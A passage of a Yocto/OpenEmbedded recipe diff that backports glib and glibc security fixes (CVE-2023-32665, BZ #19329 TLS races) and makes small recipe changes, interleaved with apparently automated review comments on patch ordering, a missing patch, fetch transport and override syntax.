+Helps: #2121
+
+CVE: CVE-2023-32665
+Upstream-Status: Backport from [https://gitlab.gnome.org/GNOME/glib/-/commit/298a537d5f6783e55d87e40011ee3fd3b22b72f9]
+Signed-off-by: Siddharth Doshi <sdoshi@mvista.com>
+---
+ glib/gvariant.c | 2 +-
+ glib/tests/gvariant.c | 12 ++++++------
+ 2 files changed, 7 insertions(+), 7 deletions(-)
+
+diff --git a/glib/gvariant.c b/glib/gvariant.c
+index f910bd4..8ba701e 100644
+--- a/glib/gvariant.c
++++ b/glib/gvariant.c
+@@ -5936,7 +5936,7 @@ g_variant_byteswap (GVariant *value)
+ if (alignment)
+ /* (potentially) contains multi-byte numeric data */
+ {
+- GVariantSerialised serialised;
++ GVariantSerialised serialised = { 0, };
+ GVariant *trusted;
+ GBytes *bytes;
+
+diff --git a/glib/tests/gvariant.c b/glib/tests/gvariant.c
+index 640f3c0..d640c81 100644
+--- a/glib/tests/gvariant.c
++++ b/glib/tests/gvariant.c
+@@ -1446,7 +1446,7 @@ test_maybe (void)
+
+ for (flavour = 0; flavour < 8; flavour += alignment)
+ {
+- GVariantSerialised serialised;
++ GVariantSerialised serialised = { 0, };
+ GVariantSerialised child;
+
+ serialised.type_info = type_info;
+@@ -1572,7 +1572,7 @@ test_array (void)
+
+ for (flavour = 0; flavour < 8; flavour += alignment)
+ {
+- GVariantSerialised serialised;
++ GVariantSerialised serialised = { 0, };
+
+ serialised.type_info = array_info;
+ serialised.data = flavoured_malloc (needed_size, flavour);
+@@ -1738,7 +1738,7 @@ test_tuple (void)
+
+ for (flavour = 0; flavour < 8; flavour += alignment)
+ {
+- GVariantSerialised serialised;
++ GVariantSerialised serialised = { 0, };
+
+ serialised.type_info = type_info;
+ serialised.data = flavoured_malloc (needed_size, flavour);
+@@ -1835,7 +1835,7 @@ test_variant (void)
+
+ for (flavour = 0; flavour < 8; flavour += alignment)
+ {
+- GVariantSerialised serialised;
++ GVariantSerialised serialised = { 0, };
+ GVariantSerialised child;
+
+ serialised.type_info = type_info;
+@@ -2284,7 +2284,7 @@ serialise_tree (TreeInstance *tree,
+ static void
+ test_byteswap (void)
+ {
+- GVariantSerialised one, two;
++ GVariantSerialised one = { 0, }, two = { 0, };
+ TreeInstance *tree;
+
+ tree = tree_instance_new (NULL, 3);
+@@ -2358,7 +2358,7 @@ test_serialiser_children (void)
+ static void
+ test_fuzz (gdouble *fuzziness)
+ {
+- GVariantSerialised serialised;
++ GVariantSerialised serialised = { 0, };
+ TreeInstance *tree;
+
+ /* make an instance */
+--
+2.24.4
+
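Review bot: The description of this backport no longer matches its place in the series. It says "The following few commits will add a couple of new fields", yet the file is numbered 0009 and listed last among the CVE-2023-32665 patches in SRC_URI. Its glib/tests/gvariant.c hunks are based on blob `640f3c0`, which is the result of the patch just above it in this diff, and that patch already adds `checked_offsets_up_to`. The upstream order appears to have been changed for the backport, so the header should record it, e.g. `Comment: Applied after CVE-2023-32665-0008.patch in this series; upstream places it before the field additions.`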
diff --git a/meta/recipes-core/glib-2.0/glib-2.0_2.62.6.bb b/meta/recipes-core/glib-2.0/glib-2.0_2.62.6.bb
index 09d253fbfb..60a6b843c1 100644
--- a/meta/recipes-core/glib-2.0/glib-2.0_2.62.6.bb
+++ b/meta/recipes-core/glib-2.0/glib-2.0_2.62.6.bb
@@ -17,6 +17,45 @@ SRC_URI = "${GNOME_MIRROR}/glib/${SHRT_VER}/glib-${PV}.tar.xz \
file://0001-meson-Run-atomics-test-on-clang-as-well.patch \
file://0001-gio-tests-resources.c-comment-out-a-build-host-only-.patch \
file://tzdata-update.patch \
+ file://CVE-2020-35457.patch \
+ file://CVE-2021-27218.patch \
+ file://CVE-2021-27219-01.patch \
+ file://CVE-2021-27219-02.patch \
+ file://CVE-2021-27219-03.patch \
+ file://CVE-2021-27219-04.patch \
+ file://CVE-2021-27219-05.patch \
+ file://CVE-2021-27219-06.patch \
+ file://CVE-2021-27219-07.patch \
+ file://CVE-2021-27219-08.patch \
+ file://CVE-2021-27219-09.patch \
+ file://CVE-2021-27219-10.patch \
+ file://CVE-2021-27219-11.patch \
+ file://CVE-2021-27219-reg1-1.patch \
+ file://CVE-2021-27219-reg1-2.patch \
+ file://CVE-2021-27219-reg1-4.patch \
+ file://CVE-2021-27219-reg1-5.patch \
+ file://CVE-2021-27219-reg2-1.patch \
+ file://CVE-2021-27219-reg2-2.patch \
+ file://CVE-2021-27219-reg2-3.patch \
+ file://CVE-2021-28153-1.patch \
+ file://CVE-2021-28153-2.patch \
+ file://CVE-2021-28153-3.patch \
+ file://CVE-2021-28153-4.patch \
+ file://CVE-2021-28153-5.patch \
+ file://CVE-2023-32665-0001.patch \
+ file://CVE-2023-32665-0002.patch \
+ file://CVE-2023-32665-0003.patch \
+ file://CVE-2023-32665-0004.patch \
+ file://CVE-2023-32665-0005.patch \
+ file://CVE-2023-32665-0006.patch \
+ file://CVE-2023-32665-0007.patch \
+ file://CVE-2023-32665-0008.patch \
+ file://CVE-2023-32665-0009.patch \
+ file://CVE-2023-29499.patch \
+ file://CVE-2023-32611-0001.patch \
+ file://CVE-2023-32611-0002.patch \
+ file://CVE-2023-32643.patch \
+ file://CVE-2023-32636.patch \
"
SRC_URI_append_class-native = " file://relocate-modules.patch"
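Review bot: The CVE-2021-27219 regression series added here skips a number: `CVE-2021-27219-reg1-1`, `-reg1-2`, `-reg1-4` and `-reg1-5` are listed, but there is no `-reg1-3`. If that patch was left out on purpose, record why in a comment above the assignment, e.g. `# CVE-2021-27219-reg1-3 not backported: <reason>`. If it was missed, the regression fix for that CVE may be incomplete on this branch. The SRC_URI assignment starts above this hunk, so the comment would go outside the lines shown.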
diff --git a/meta/recipes-core/glib-2.0/glib.inc b/meta/recipes-core/glib-2.0/glib.inc
index 7ebed0e5fd..1849a6e05c 100644
--- a/meta/recipes-core/glib-2.0/glib.inc
+++ b/meta/recipes-core/glib-2.0/glib.inc
@@ -4,7 +4,7 @@ HOMEPAGE = "https://developer.gnome.org/glib/"
# pcre is under BSD;
# docs/reference/COPYING is with a 'public domain'-like license!
-LICENSE = "LGPLv2.1+ & BSD & PD"
+LICENSE = "LGPLv2.1+ & BSD-3-Clause & PD"
LIC_FILES_CHKSUM = "file://COPYING;md5=4fbd65380cdd255951079008b364516c \
file://glib/glib.h;beginline=4;endline=17;md5=b88abb7f3ad09607e71cb9d530155906 \
file://gmodule/COPYING;md5=4fbd65380cdd255951079008b364516c \
@@ -32,10 +32,6 @@ inherit meson gettext gtk-doc pkgconfig ptest-gnome upstream-version-is-even bas
GTKDOC_MESON_OPTION = "gtk_doc"
-# This avoids the need to depend on target python3, which in case of mingw is not even possible.
-# meson's python configuration pokes into python3 configuration, so this provides the native config to it.
-unset _PYTHON_SYSCONFIGDATA_NAME
-
S = "${WORKDIR}/glib-${PV}"
PACKAGECONFIG ??= "system-pcre libmount \
diff --git a/meta/recipes-core/glib-networking/glib-networking_2.62.4.bb b/meta/recipes-core/glib-networking/glib-networking_2.62.4.bb
index b74532087c..c476a7cba5 100644
--- a/meta/recipes-core/glib-networking/glib-networking_2.62.4.bb
+++ b/meta/recipes-core/glib-networking/glib-networking_2.62.4.bb
@@ -31,4 +31,4 @@ FILES_${PN} += "\
FILES_${PN}-dev += "${libdir}/gio/modules/libgio*.la"
FILES_${PN}-staticdev += "${libdir}/gio/modules/libgio*.a"
-BBCLASSEXTEND = "native"
+BBCLASSEXTEND = "native nativesdk"
diff --git a/meta/recipes-core/glibc/cross-localedef-native_2.31.bb b/meta/recipes-core/glibc/cross-localedef-native_2.31.bb
index 24de55d929..9aa24eccfe 100644
--- a/meta/recipes-core/glibc/cross-localedef-native_2.31.bb
+++ b/meta/recipes-core/glibc/cross-localedef-native_2.31.bb
@@ -20,7 +20,7 @@ inherit autotools
FILESEXTRAPATHS =. "${FILE_DIRNAME}/${PN}:${FILE_DIRNAME}/glibc:"
SRC_URI = "${GLIBC_GIT_URI};branch=${SRCBRANCH};name=glibc \
- git://github.com/kraj/localedef;branch=master;name=localedef;destsuffix=git/localedef \
+ git://github.com/kraj/localedef;branch=master;name=localedef;destsuffix=git/localedef;protocol=https \
\
file://0001-localedef-Add-hardlink-resolver-to-build.patch;patchdir=localedef \
\
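Review bot: Only the localedef entry gains `protocol=https`; the first entry, `${GLIBC_GIT_URI};branch=${SRCBRANCH};name=glibc`, still carries no protocol parameter. The glibc-version.inc hunk in this same diff shows GLIBC_GIT_URI defaulting to `git://sourceware.org/git/glibc.git`. That fetch therefore still uses the plain git transport, which has no server authentication or encryption, leaving the pinned SRCREV as the only integrity check. If the HTTPS endpoint is acceptable for this branch, the entry could become `${GLIBC_GIT_URI};branch=${SRCBRANCH};name=glibc;protocol=https \`.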
diff --git a/meta/recipes-core/glibc/glibc-version.inc b/meta/recipes-core/glibc/glibc-version.inc
index 3bcd336de4..95e2bba301 100644
--- a/meta/recipes-core/glibc/glibc-version.inc
+++ b/meta/recipes-core/glibc/glibc-version.inc
@@ -1,6 +1,6 @@
SRCBRANCH ?= "release/2.31/master"
PV = "2.31+git${SRCPV}"
-SRCREV_glibc ?= "6fdf971c9dbf7dac9bea552113fe4694015bbc4d"
+SRCREV_glibc ?= "2d4f26e5cfda682f9ce61444b81533b83f6381af"
SRCREV_localedef ?= "cd9f958c4c94a638fa7b2b4e21627364f1a1a655"
GLIBC_GIT_URI ?= "git://sourceware.org/git/glibc.git"
diff --git a/meta/recipes-core/glibc/glibc.inc b/meta/recipes-core/glibc/glibc.inc
index 23a6ca99ae..e42040f3dc 100644
--- a/meta/recipes-core/glibc/glibc.inc
+++ b/meta/recipes-core/glibc/glibc.inc
@@ -1,7 +1,9 @@
require glibc-common.inc
require glibc-ld.inc
-DEPENDS = "virtual/${TARGET_PREFIX}gcc libgcc-initial linux-libc-headers"
+DEPENDS = "virtual/${TARGET_PREFIX}gcc virtual/${TARGET_PREFIX}binutils${BUSUFFIX} libgcc-initial linux-libc-headers"
+BUSUFFIX= ""
+BUSUFFIX:class-nativesdk = "-crosssdk"
PROVIDES = "virtual/libc"
PROVIDES += "virtual/libintl virtual/libiconv"
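Review bot: `BUSUFFIX:class-nativesdk` uses the colon override form, while the other recipes touched in this diff use the underscore form (`SRC_URI_append_class-native`, `FILES_${PN}-dev`). If the bitbake on this branch does not treat `:` as an override separator, the nativesdk build would keep the empty suffix and DEPENDS would name the wrong binutils provider without any error, so this is worth confirming with `bitbake -e nativesdk-glibc`. Unless the colon form is known to work here, `BUSUFFIX_class-nativesdk = "-crosssdk"` is the safer spelling. The line above it is also missing a space before `=` and would read better as `BUSUFFIX = ""`.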
diff --git a/meta/recipes-core/glibc/glibc/0030-elf-Refactor_dl_update-slotinfo-to-avoid-use-after-free.patch b/meta/recipes-core/glibc/glibc/0030-elf-Refactor_dl_update-slotinfo-to-avoid-use-after-free.patch
new file mode 100644
index 0000000000..dba491f4dc
--- /dev/null
+++ b/meta/recipes-core/glibc/glibc/0030-elf-Refactor_dl_update-slotinfo-to-avoid-use-after-free.patch
@@ -0,0 +1,66 @@
+From c0669ae1a629e16b536bf11cdd0865e0dbcf4bee Mon Sep 17 00:00:00 2001
+From: Szabolcs Nagy <szabolcs.nagy@arm.com>
+Date: Wed, 30 Dec 2020 21:52:38 +0000
+Subject: [PATCH] elf: Refactor _dl_update_slotinfo to avoid use after free
+
+map is not valid to access here because it can be freed by a concurrent
+dlclose: during tls access (via __tls_get_addr) _dl_update_slotinfo is
+called without holding dlopen locks. So don't check the modid of map.
+
+The map == 0 and map != 0 code paths can be shared (avoiding the dtv
+resize in case of map == 0 is just an optimization: larger dtv than
+necessary would be fine too).
+
+Reviewed-by: Adhemerval Zanella <adhemerval.zanella@linaro.org>
+---
+ elf/dl-tls.c | 21 +++++----------------
+ 1 file changed, 5 insertions(+), 16 deletions(-)
+---
+Upstream-Status: Backport [https://sourceware.org/git/?p=glibc.git;a=patch;h=c0669ae1a629e16b536bf11cdd0865e0dbcf4bee]
+Signed-off-by: Akash Hadke <akash.hadke@kpit.com>
+Signed-off-by: Akash Hadke <hadkeakash4@gmail.com>
+---
+diff --git a/elf/dl-tls.c b/elf/dl-tls.c
+index 24d00c14ef..f8b32b3ecb 100644
+--- a/elf/dl-tls.c
++++ b/elf/dl-tls.c
+@@ -743,6 +743,8 @@ _dl_update_slotinfo (unsigned long int req_modid)
+ {
+ for (size_t cnt = total == 0 ? 1 : 0; cnt < listp->len; ++cnt)
+ {
++ size_t modid = total + cnt;
++
+ size_t gen = listp->slotinfo[cnt].gen;
+
+ if (gen > new_gen)
+@@ -758,25 +760,12 @@ _dl_update_slotinfo (unsigned long int req_modid)
+
+ /* If there is no map this means the entry is empty. */
+ struct link_map *map = listp->slotinfo[cnt].map;
+- if (map == NULL)
+- {
+- if (dtv[-1].counter >= total + cnt)
+- {
+- /* If this modid was used at some point the memory
+- might still be allocated. */
+- free (dtv[total + cnt].pointer.to_free);
+- dtv[total + cnt].pointer.val = TLS_DTV_UNALLOCATED;
+- dtv[total + cnt].pointer.to_free = NULL;
+- }
+-
+- continue;
+- }
+-
+ /* Check whether the current dtv array is large enough. */
+- size_t modid = map->l_tls_modid;
+- assert (total + cnt == modid);
+ if (dtv[-1].counter < modid)
+ {
++ if (map == NULL)
++ continue;
++
+ /* Resize the dtv. */
+ dtv = _dl_resize_dtv (dtv);
+
+--
+2.27.0
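Review bot: After this change nothing in the loop explains why `modid` is computed as `total + cnt` rather than read from the map. The retained comment "If there is no map this means the entry is empty" now sits above a load whose NULL test has moved into the resize branch. The reason is given only in the commit message: map can be freed by a concurrent dlclose, because _dl_update_slotinfo runs without the dlopen locks during TLS access. A later refresh could therefore reintroduce a `map->l_tls_modid` read without noticing. A comment on the new line would keep the constraint visible: `/* Do not read map->l_tls_modid: map may be freed by a concurrent dlclose. */`. The body of _dl_update_slotinfo continues outside both embedded hunks.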
diff --git a/meta/recipes-core/glibc/glibc/0031-elf-Fix-data-races-in-pthread_create-and-TLS-access-BZ-19329.patch b/meta/recipes-core/glibc/glibc/0031-elf-Fix-data-races-in-pthread_create-and-TLS-access-BZ-19329.patch
new file mode 100644
index 0000000000..25beee1d50
--- /dev/null
+++ b/meta/recipes-core/glibc/glibc/0031-elf-Fix-data-races-in-pthread_create-and-TLS-access-BZ-19329.patch
@@ -0,0 +1,191 @@
+From 1387ad6225c2222f027790e3f460e31aa5dd2c54 Mon Sep 17 00:00:00 2001
+From: Szabolcs Nagy <szabolcs.nagy@arm.com>
+Date: Wed, 30 Dec 2020 19:19:37 +0000
+Subject: [PATCH] elf: Fix data races in pthread_create and TLS access [BZ
+ #19329]
+
+DTV setup at thread creation (_dl_allocate_tls_init) is changed
+to take the dlopen lock, GL(dl_load_lock). Avoiding data races
+here without locks would require design changes: the map that is
+accessed for static TLS initialization here may be concurrently
+freed by dlclose. That use after free may be solved by only
+locking around static TLS setup or by ensuring dlclose does not
+free modules with static TLS, however currently every link map
+with TLS has to be accessed at least to see if it needs static
+TLS. And even if that's solved, still a lot of atomics would be
+needed to synchronize DTV related globals without a lock. So fix
+both bug 19329 and bug 27111 with a lock that prevents DTV setup
+running concurrently with dlopen or dlclose.
+
+_dl_update_slotinfo at TLS access still does not use any locks
+so CONCURRENCY NOTES are added to explain the synchronization.
+The early exit from the slotinfo walk when max_modid is reached
+is not strictly necessary, but does not hurt either.
+
+An incorrect acquire load was removed from _dl_resize_dtv: it
+did not synchronize with any release store or fence and
+synchronization is now handled separately at thread creation
+and TLS access time.
+
+There are still a number of racy read accesses to globals that
+will be changed to relaxed MO atomics in a followup patch. This
+should not introduce regressions compared to existing behaviour
+and avoid cluttering the main part of the fix.
+
+Not all TLS access related data races got fixed here: there are
+additional races at lazy tlsdesc relocations see bug 27137.
+
+Reviewed-by: Adhemerval Zanella <adhemerval.zanella@linaro.org>
+---
+ elf/dl-tls.c | 63 +++++++++++++++++++++++++++++++++++++++-------------
+ 1 file changed, 47 insertions(+), 16 deletions(-)
+---
+Upstream-Status: Backport [https://sourceware.org/git/?p=glibc.git;a=patch;h=1387ad6225c2222f027790e3f460e31aa5dd2c54]
+Signed-off-by: Akash Hadke <akash.hadke@kpit.com>
+Signed-off-by: Akash Hadke <hadkeakash4@gmail.com>
+---
+diff --git a/elf/dl-tls.c b/elf/dl-tls.c
+index 6baff0c1ea..94f3cdbae0 100644
+--- a/elf/dl-tls.c
++++ b/elf/dl-tls.c
+@@ -475,14 +475,11 @@ extern dtv_t _dl_static_dtv[];
+ #endif
+
+ static dtv_t *
+-_dl_resize_dtv (dtv_t *dtv)
++_dl_resize_dtv (dtv_t *dtv, size_t max_modid)
+ {
+ /* Resize the dtv. */
+ dtv_t *newp;
+- /* Load GL(dl_tls_max_dtv_idx) atomically since it may be written to by
+- other threads concurrently. */
+- size_t newsize
+- = atomic_load_acquire (&GL(dl_tls_max_dtv_idx)) + DTV_SURPLUS;
++ size_t newsize = max_modid + DTV_SURPLUS;
+ size_t oldsize = dtv[-1].counter;
+
+ if (dtv == GL(dl_initial_dtv))
+@@ -528,11 +525,14 @@ _dl_allocate_tls_init (void *result)
+ size_t total = 0;
+ size_t maxgen = 0;
+
++ /* Protects global dynamic TLS related state. */
++ __rtld_lock_lock_recursive (GL(dl_load_lock));
++
+ /* Check if the current dtv is big enough. */
+ if (dtv[-1].counter < GL(dl_tls_max_dtv_idx))
+ {
+ /* Resize the dtv. */
+- dtv = _dl_resize_dtv (dtv);
++ dtv = _dl_resize_dtv (dtv, GL(dl_tls_max_dtv_idx));
+
+ /* Install this new dtv in the thread data structures. */
+ INSTALL_DTV (result, &dtv[-1]);
+@@ -600,6 +600,7 @@ _dl_allocate_tls_init (void *result)
+ listp = listp->next;
+ assert (listp != NULL);
+ }
++ __rtld_lock_unlock_recursive (GL(dl_load_lock));
+
+ /* The DTV version is up-to-date now. */
+ dtv[0].counter = maxgen;
+@@ -734,12 +735,29 @@ _dl_update_slotinfo (unsigned long int req_modid)
+
+ if (dtv[0].counter < listp->slotinfo[idx].gen)
+ {
+- /* The generation counter for the slot is higher than what the
+- current dtv implements. We have to update the whole dtv but
+- only those entries with a generation counter <= the one for
+- the entry we need. */
++ /* CONCURRENCY NOTES:
++
++ Here the dtv needs to be updated to new_gen generation count.
++
++ This code may be called during TLS access when GL(dl_load_lock)
++ is not held. In that case the user code has to synchronize with
++ dlopen and dlclose calls of relevant modules. A module m is
++ relevant if the generation of m <= new_gen and dlclose of m is
++ synchronized: a memory access here happens after the dlopen and
++ before the dlclose of relevant modules. The dtv entries for
++ relevant modules need to be updated, other entries can be
++ arbitrary.
++
++ This e.g. means that the first part of the slotinfo list can be
++ accessed race free, but the tail may be concurrently extended.
++ Similarly relevant slotinfo entries can be read race free, but
++ other entries are racy. However updating a non-relevant dtv
++ entry does not affect correctness. For a relevant module m,
++ max_modid >= modid of m. */
+ size_t new_gen = listp->slotinfo[idx].gen;
+ size_t total = 0;
++ size_t max_modid = atomic_load_relaxed (&GL(dl_tls_max_dtv_idx));
++ assert (max_modid >= req_modid);
+
+ /* We have to look through the entire dtv slotinfo list. */
+ listp = GL(dl_tls_dtv_slotinfo_list);
+@@ -749,12 +767,14 @@ _dl_update_slotinfo (unsigned long int req_modid)
+ {
+ size_t modid = total + cnt;
+
++ /* Later entries are not relevant. */
++ if (modid > max_modid)
++ break;
++
+ size_t gen = listp->slotinfo[cnt].gen;
+
+ if (gen > new_gen)
+- /* This is a slot for a generation younger than the
+- one we are handling now. It might be incompletely
+- set up so ignore it. */
++ /* Not relevant. */
+ continue;
+
+ /* If the entry is older than the current dtv layout we
+@@ -771,7 +791,7 @@ _dl_update_slotinfo (unsigned long int req_modid)
+ continue;
+
+ /* Resize the dtv. */
+- dtv = _dl_resize_dtv (dtv);
++ dtv = _dl_resize_dtv (dtv, max_modid);
+
+ assert (modid <= dtv[-1].counter);
+
+@@ -793,8 +813,17 @@ _dl_update_slotinfo (unsigned long int req_modid)
+ }
+
+ total += listp->len;
++ if (total > max_modid)
++ break;
++
++ /* Synchronize with _dl_add_to_slotinfo. Ideally this would
++ be consume MO since we only need to order the accesses to
++ the next node after the read of the address and on most
++ hardware (other than alpha) a normal load would do that
++ because of the address dependency. */
++ listp = atomic_load_acquire (&listp->next);
+ }
+- while ((listp = listp->next) != NULL);
++ while (listp != NULL);
+
+ /* This will be the new maximum generation counter. */
+ dtv[0].counter = new_gen;
+@@ -986,7 +1015,7 @@ _dl_add_to_slotinfo (struct link_map *l, bool do_add)
+ the first slot. */
+ assert (idx == 0);
+
+- listp = prevp->next = (struct dtv_slotinfo_list *)
++ listp = (struct dtv_slotinfo_list *)
+ malloc (sizeof (struct dtv_slotinfo_list)
+ + TLS_SLOTINFO_SURPLUS * sizeof (struct dtv_slotinfo));
+ if (listp == NULL)
+@@ -1000,6 +1029,8 @@ cannot create TLS data structures"));
+ listp->next = NULL;
+ memset (listp->slotinfo, '\0',
+ TLS_SLOTINFO_SURPLUS * sizeof (struct dtv_slotinfo));
++ /* Synchronize with _dl_update_slotinfo. */
++ atomic_store_release (&prevp->next, listp);
+ }
+
+ /* Add the information into the slotinfo data structure. */
+--
+2.27.0
diff --git a/meta/recipes-core/glibc/glibc/0032-elf-Use-relaxed-atomics-for-racy-accesses-BZ-19329.patch b/meta/recipes-core/glibc/glibc/0032-elf-Use-relaxed-atomics-for-racy-accesses-BZ-19329.patch
new file mode 100644
index 0000000000..eb8ef3161c
--- /dev/null
+++ b/meta/recipes-core/glibc/glibc/0032-elf-Use-relaxed-atomics-for-racy-accesses-BZ-19329.patch
@@ -0,0 +1,206 @@
+From f4f8f4d4e0f92488431b268c8cd9555730b9afe9 Mon Sep 17 00:00:00 2001
+From: Szabolcs Nagy <szabolcs.nagy@arm.com>
+Date: Wed, 30 Dec 2020 19:19:37 +0000
+Subject: [PATCH] elf: Use relaxed atomics for racy accesses [BZ #19329]
+
+This is a follow up patch to the fix for bug 19329. This adds relaxed
+MO atomics to accesses that were previously data races but are now
+race conditions, and where relaxed MO is sufficient.
+
+The race conditions all follow the pattern that the write is behind the
+dlopen lock, but a read can happen concurrently (e.g. during tls access)
+without holding the lock. For slotinfo entries the read value only
+matters if it reads from a synchronized write in dlopen or dlclose,
+otherwise the related dtv entry is not valid to access so it is fine
+to leave it in an inconsistent state. The same applies for
+GL(dl_tls_max_dtv_idx) and GL(dl_tls_generation), but there the
+algorithm relies on the fact that the read of the last synchronized
+write is an increasing value.
+
+Reviewed-by: Adhemerval Zanella <adhemerval.zanella@linaro.org>
+---
+ elf/dl-close.c | 20 +++++++++++++-------
+ elf/dl-open.c | 5 ++++-
+ elf/dl-tls.c | 31 +++++++++++++++++++++++--------
+ sysdeps/x86_64/dl-tls.c | 3 ++-
+ 4 files changed, 42 insertions(+), 17 deletions(-)
+---
+Upstream-Status: Backport [https://sourceware.org/git/?p=glibc.git;a=patch;h=f4f8f4d4e0f92488431b268c8cd9555730b9afe9]
+Comment: Hunks from elf/dl-open.c and elf/dl-tls.c are refreshed due to offset change.
+Signed-off-by: Akash Hadke <akash.hadke@kpit.com>
+Signed-off-by: Akash Hadke <hadkeakash4@gmail.com>
+---
+diff --git a/elf/dl-close.c b/elf/dl-close.c
+index c51becd06b..3720e47dd1 100644
+--- a/elf/dl-close.c
++++ b/elf/dl-close.c
+@@ -79,9 +79,10 @@ remove_slotinfo (size_t idx, struct dtv_slotinfo_list *listp, size_t disp,
+ {
+ assert (old_map->l_tls_modid == idx);
+
+- /* Mark the entry as unused. */
+- listp->slotinfo[idx - disp].gen = GL(dl_tls_generation) + 1;
+- listp->slotinfo[idx - disp].map = NULL;
++ /* Mark the entry as unused. These can be read concurrently. */
++ atomic_store_relaxed (&listp->slotinfo[idx - disp].gen,
++ GL(dl_tls_generation) + 1);
++ atomic_store_relaxed (&listp->slotinfo[idx - disp].map, NULL);
+ }
+
+ /* If this is not the last currently used entry no need to look
+@@ -96,8 +97,8 @@ remove_slotinfo (size_t idx, struct dtv_slotinfo_list *listp, size_t disp,
+
+ if (listp->slotinfo[idx - disp].map != NULL)
+ {
+- /* Found a new last used index. */
+- GL(dl_tls_max_dtv_idx) = idx;
++ /* Found a new last used index. This can be read concurrently. */
++ atomic_store_relaxed (&GL(dl_tls_max_dtv_idx), idx);
+ return true;
+ }
+ }
+@@ -571,7 +572,9 @@ _dl_close_worker (struct link_map *map, bool force)
+ GL(dl_tls_dtv_slotinfo_list), 0,
+ imap->l_init_called))
+ /* All dynamically loaded modules with TLS are unloaded. */
+- GL(dl_tls_max_dtv_idx) = GL(dl_tls_static_nelem);
++ /* Can be read concurrently. */
++ atomic_store_relaxed (&GL(dl_tls_max_dtv_idx),
++ GL(dl_tls_static_nelem));
+
+ if (imap->l_tls_offset != NO_TLS_OFFSET
+ && imap->l_tls_offset != FORCED_DYNAMIC_TLS_OFFSET)
+@@ -769,8 +772,11 @@ _dl_close_worker (struct link_map *map, bool force)
+ /* If we removed any object which uses TLS bump the generation counter. */
+ if (any_tls)
+ {
+- if (__glibc_unlikely (++GL(dl_tls_generation) == 0))
++ size_t newgen = GL(dl_tls_generation) + 1;
++ if (__glibc_unlikely (newgen == 0))
+ _dl_fatal_printf ("TLS generation counter wrapped! Please report as described in "REPORT_BUGS_TO".\n");
++ /* Can be read concurrently. */
++ atomic_store_relaxed (&GL(dl_tls_generation), newgen);
+
+ if (tls_free_end == GL(dl_tls_static_used))
+ GL(dl_tls_static_used) = tls_free_start;
+diff --git a/elf/dl-open.c b/elf/dl-open.c
+index 09f0df7d38..bb79ef00f1 100644
+--- a/elf/dl-open.c
++++ b/elf/dl-open.c
+@@ -387,9 +387,12 @@
+ }
+ }
+
+- if (__builtin_expect (++GL(dl_tls_generation) == 0, 0))
++ size_t newgen = GL(dl_tls_generation) + 1;
++ if (__glibc_unlikely (newgen == 0))
+ _dl_fatal_printf (N_("\
+ TLS generation counter wrapped! Please report this."));
++ /* Can be read concurrently. */
++ atomic_store_relaxed (&GL(dl_tls_generation), newgen);
+
+ /* We need a second pass for static tls data, because
+ _dl_update_slotinfo must not be run while calls to
+diff --git a/elf/dl-tls.c b/elf/dl-tls.c
+index 94f3cdbae0..dc69cd984e 100644
+--- a/elf/dl-tls.c
++++ b/elf/dl-tls.c
+@@ -96,7 +96,9 @@
+ /* No gaps, allocate a new entry. */
+ nogaps:
+
+- result = ++GL(dl_tls_max_dtv_idx);
++ result = GL(dl_tls_max_dtv_idx) + 1;
++ /* Can be read concurrently. */
++ atomic_store_relaxed (&GL(dl_tls_max_dtv_idx), result);
+ }
+
+ return result;
+@@ -279,10 +281,12 @@
+ dtv_t *dtv;
+ size_t dtv_length;
+
++ /* Relaxed MO, because the dtv size is later rechecked, not relied on. */
++ size_t max_modid = atomic_load_relaxed (&GL(dl_tls_max_dtv_idx));
+ /* We allocate a few more elements in the dtv than are needed for the
+ initial set of modules. This should avoid in most cases expansions
+ of the dtv. */
+- dtv_length = GL(dl_tls_max_dtv_idx) + DTV_SURPLUS;
++ dtv_length = max_modid + DTV_SURPLUS;
+ dtv = calloc (dtv_length + 2, sizeof (dtv_t));
+ if (dtv != NULL)
+ {
+@@ -687,7 +691,7 @@
+ if (modid > max_modid)
+ break;
+
+- size_t gen = listp->slotinfo[cnt].gen;
++ size_t gen = atomic_load_relaxed (&listp->slotinfo[cnt].gen);
+
+ if (gen > new_gen)
+ /* Not relevant. */
+@@ -699,7 +703,8 @@
+ continue;
+
+ /* If there is no map this means the entry is empty. */
+- struct link_map *map = listp->slotinfo[cnt].map;
++ struct link_map *map
++ = atomic_load_relaxed (&listp->slotinfo[cnt].map);
+ /* Check whether the current dtv array is large enough. */
+ if (dtv[-1].counter < modid)
+ {
+@@ -843,7 +848,12 @@
+ {
+ dtv_t *dtv = THREAD_DTV ();
+
+- if (__glibc_unlikely (dtv[0].counter != GL(dl_tls_generation)))
++ /* Update is needed if dtv[0].counter < the generation of the accessed
++ module. The global generation counter is used here as it is easier
++ to check. Synchronization for the relaxed MO access is guaranteed
++ by user code, see CONCURRENCY NOTES in _dl_update_slotinfo. */
++ size_t gen = atomic_load_relaxed (&GL(dl_tls_generation));
++ if (__glibc_unlikely (dtv[0].counter != gen))
+ return update_get_addr (GET_ADDR_PARAM);
+
+ void *p = dtv[GET_ADDR_MODULE].pointer.val;
+@@ -866,7 +876,10 @@
+ return NULL;
+
+ dtv_t *dtv = THREAD_DTV ();
+- if (__glibc_unlikely (dtv[0].counter != GL(dl_tls_generation)))
++ /* This may be called without holding the GL(dl_load_lock). Reading
++ arbitrary gen value is fine since this is best effort code. */
++ size_t gen = atomic_load_relaxed (&GL(dl_tls_generation));
++ if (__glibc_unlikely (dtv[0].counter != gen))
+ {
+ /* This thread's DTV is not completely current,
+ but it might already cover this module. */
+@@ -961,7 +974,9 @@
+ /* Add the information into the slotinfo data structure. */
+ if (do_add)
+ {
+- listp->slotinfo[idx].map = l;
+- listp->slotinfo[idx].gen = GL(dl_tls_generation) + 1;
++ /* Can be read concurrently. See _dl_update_slotinfo. */
++ atomic_store_relaxed (&listp->slotinfo[idx].map, l);
++ atomic_store_relaxed (&listp->slotinfo[idx].gen,
++ GL(dl_tls_generation) + 1);
+ }
+ }
+
+diff --git a/sysdeps/x86_64/dl-tls.c b/sysdeps/x86_64/dl-tls.c
+index 6595f6615b..24ef560b71 100644
+--- a/sysdeps/x86_64/dl-tls.c
++++ b/sysdeps/x86_64/dl-tls.c
+@@ -40,7 +40,8 @@ __tls_get_addr_slow (GET_ADDR_ARGS)
+ {
+ dtv_t *dtv = THREAD_DTV ();
+
+- if (__glibc_unlikely (dtv[0].counter != GL(dl_tls_generation)))
++ size_t gen = atomic_load_relaxed (&GL(dl_tls_generation));
++ if (__glibc_unlikely (dtv[0].counter != gen))
+ return update_get_addr (GET_ADDR_PARAM);
+
